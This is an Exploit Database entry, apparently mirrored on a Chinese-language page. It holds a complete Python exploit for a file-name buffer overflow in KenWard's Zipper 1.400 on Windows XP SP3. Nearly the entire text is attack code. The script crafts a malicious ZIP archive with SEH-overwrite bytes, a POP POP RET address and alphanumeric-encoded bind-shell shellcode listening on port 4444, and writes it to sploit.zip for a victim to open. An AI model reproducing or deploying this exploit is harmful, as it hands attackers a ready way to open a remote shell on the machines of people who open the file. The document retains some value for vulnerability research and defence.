KenWard’s Zipper 1.400 – Local Buffer Overflow (2)

• Exploit Database
• 12 阅读

• 作者： sinn3r
  日期： 2010-03-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11872/

• #!/usr/bin/python
  
  ## KenWard's Zipper v1.400 File Name Buffer Overflow
  ## Coded by sinn3r(x90.sinner{at}gmail{d0t}com)
  ## Tested on: Windows XP SP3 ENG
  ## Reference: http://www.exploit-db.com/exploits/11834
  ## Big thanks to mr_me, and corelanc0d3r.
  ## greetz to all the friends at Corelan Scurity Team & Exploit-DB... coolest people ever!
  ##
  ## Description:
  ## This exploit takes advantage of the fact too many characters get mangled, as a result
  ## I was able to get a shell in a more straight forward way.Very interesting exercise.
  ## Mr_me and tecR0c figured out this trick, of course.But I was given the honor to share it.
  
  ## Script provided 'as is', without any warranty.
  ## Use for educational purposes only.Do not use this code to do anything illegal.
  
  ## Zip file format based on:
  ## http://en.wikipedia.org/wiki/ZIP_(file_format)
  local_file_header = (
  "\x50\x4B\x03\x04" 	#Local file header signature
  "\x00\x02"		#Version needed to extract
  "\x00\x08"		#General purpose bit flag
  "\x00\xDA"		#Compression method
  "\xA2\x48"		#File last modification time
  "\x3B\xF6"		#File last modification date
  "\x66\x18\x0D\x4E"	#CRC-32
  "\xEF\x0F\x00\x00"	#Compressed size (payload size)
  "\x14\x00\x00\x00"	#Uncompressed size
  "\xe4\x4f"		#File name length
  "\x04\x00"		#Extra field length
  #"\x73\x65\x63\x72\x65\x74\x73"	#File name (n) ASCII "secrets"
  #"\x42\x42\x42\x42"	#Extra field (m)
  );
  
  central_directory_file_header = (
  "\x50\x4b\x01\x02"	#Central directory file header signature
  "\x14\x00"		#Version made by
  "\x14\x00"		#Version needed to extract
  "\x00\x08"		#General purpose bit flag
  "\x00\xDA"		#Compression method
  "\xA2\x48"		#File last modification time
  "\x3B\xF6"		#File last modification date
  "\x66\x18\x0D\x4E"	#CRC-32
  "\xE4\x0F\x00\x00"	#Compressed size (payload size)
  "\x14\x00\x00\x00"	#Uncompressed size
  "\xe4\x0f"		#File name length (n)
  "\x04\x00"		#Extra field length (m)
  "\x04\x00"		#File comment length
  "\x00\x01"		#Disk number where file starts
  "\x00\x00"		#Internal file attributes
  "\x20\x00\x00\x00"	#External file attributes
  "\x00\x00\x00\x00"	#Relative offset of local file header
  #"\x73\x65\x63\x72\x65\x74\x73"	#File name (n) ASCII "secrets"
  #"\x42\x42\x42\x42"	#Extra field (m)
  #"\x43\x43\x43\x43"	#File comment (k)
  );
  
  end_of_central_directory_record = (
  "\x50\x4B\x05\x06"	#End of central directory signature
  "\x00\x00"		#Number of this disk
  "\x00\x00"		#Disk where central directory starts
  "\x01\x00"		#Number of central directory records on this disk
  "\x01\x00"		#Total number of central directory records
  "\x12\x10\x00\x00"	#Size of central directory (central directory size + payload)
  "\x02\x10\x00\x00"	#Offset of start of central directory, relative to start of archive (lfh + payload)
  "\x00\x00"		#Zip file comment length (n)
  );
  
  
  ## Align EAX for the base address of the alpha2 encoded bindshell
  alignEAX = (
  "\x05\x10\x7E\x10\x7E"	#ADD EAX, 0x7E107E10
  "\x05\x09\x75\x01\x7E"	#ADD EAX, 0x7E017509
  "\x05\x02\x03\x01\x04"	#ADD EAX, 0x04010302
  "\x72\x07"+		#JB jump over the bytes we can't overwrite
  "\x41"*12		#NOPs
  );
  
  ## windows/shell_bind_tcp lport=4444 exitfunc=seh
  ## alpha2 eax --uppercase 744 bytes
  shellcode = ("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS03PK"
  "9ZE6QN2CTLK0RVPLKPR4LLKQBTTLKSBVH4ONWQZVFFQKOFQO0NLGL3QSL4BVLQ0YQXO4MUQIWKRJPF2QGLKPRB0"
  "LKPBGLEQ8PLK70RXMUO0BTQZEQHPPPLK78TXLK687PS1XSM37LPILKWDLKUQ8V6QKO6QYPNL9Q8OTMEQ9WFXKPT"
  "5ZT33SMJX7KCM14CEZB1HLKPXWTUQN3SVLKTLPKLKV85LEQXSLK34LKS1HPK9W47TQ4QK1KSQQI0Z0QKOM0PXQO"
  "QJLKTRJKK61MSXVS02EP5PCXBW3CFRQOF4SXPLT77VDGKO9EX8LPS1UPS0WYO4F4PP3X7YMP2KS0KOHUV00P0P6"
  "0QPV01PPPRHJJTOIOKPKON5MYO7FQYK0SSXS2S0TQQLMYKVSZB0PVPW3XO2YK7GCWKO8UPSPWE8X7KYWHKOKOHU"
  "QCV3PWSX2TJLGKKQKON5V7MYHG58BU2N0M3QKON52HRCBM54UPMYKS0W67676QL62JTRPYPVKRKMSVO774WTWLU"
  "QUQLM0DGTB0O65PPD0TV0PV0V0VQVPVPNPV1FQC66SXT9XLWOLFKOYEK9M0PNV6QVKOFPCXUXK75MSPKON5OKKN"
  "TNP2ZJBHY6LUOMMMKON5WLUV3L5ZK0KKKPRUC5OKW74S2R2ORJ5PPSKO8UUZA")
  
  ## 4064+4 bytes
  ## Pointer to next SEH record: 1022 bytes
  ## SE handler: 1026 bytes
  payload = (
  "\x41"*(1017-len(alignEAX)-len(shellcode))+	#Padding
  alignEAX+					#Align EAX for the bindshell
  shellcode+					#Bindshell lport 4444
  "\x82\x85\x81\x98\x98"				#This will get mangled and become "\xE9\xE0\xFC\xFF\xFF"
  "\x73\x97\x42\x42"				#JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes
  "\x7E\x27\x41\x00"+				#POP POP RET = 0x0041277E
  "\x44"*3034+					#Padding
  ".bin"						#Fake name
  );
  
  ## Create the ZIP structure with our payload
  zip = (
  local_file_header +
  payload +
  central_directory_file_header +
  payload +
  end_of_central_directory_record
  );
  
  f = open("sploit.zip", "w")
  f.write(zip)
  f.close()
  
  print "[*] Local file header size = 0x%x" %len(local_file_header)
  print "[*] Central directory file header size = 0x%x" %len(central_directory_file_header)
  print "[*] End of central directory record size = 0x%x" %len(end_of_central_directory_record)
  print "[*] Payload size = %s bytes" %len(payload)
  print "[*] sploit.zip created.Open it with KenWard's Zipper."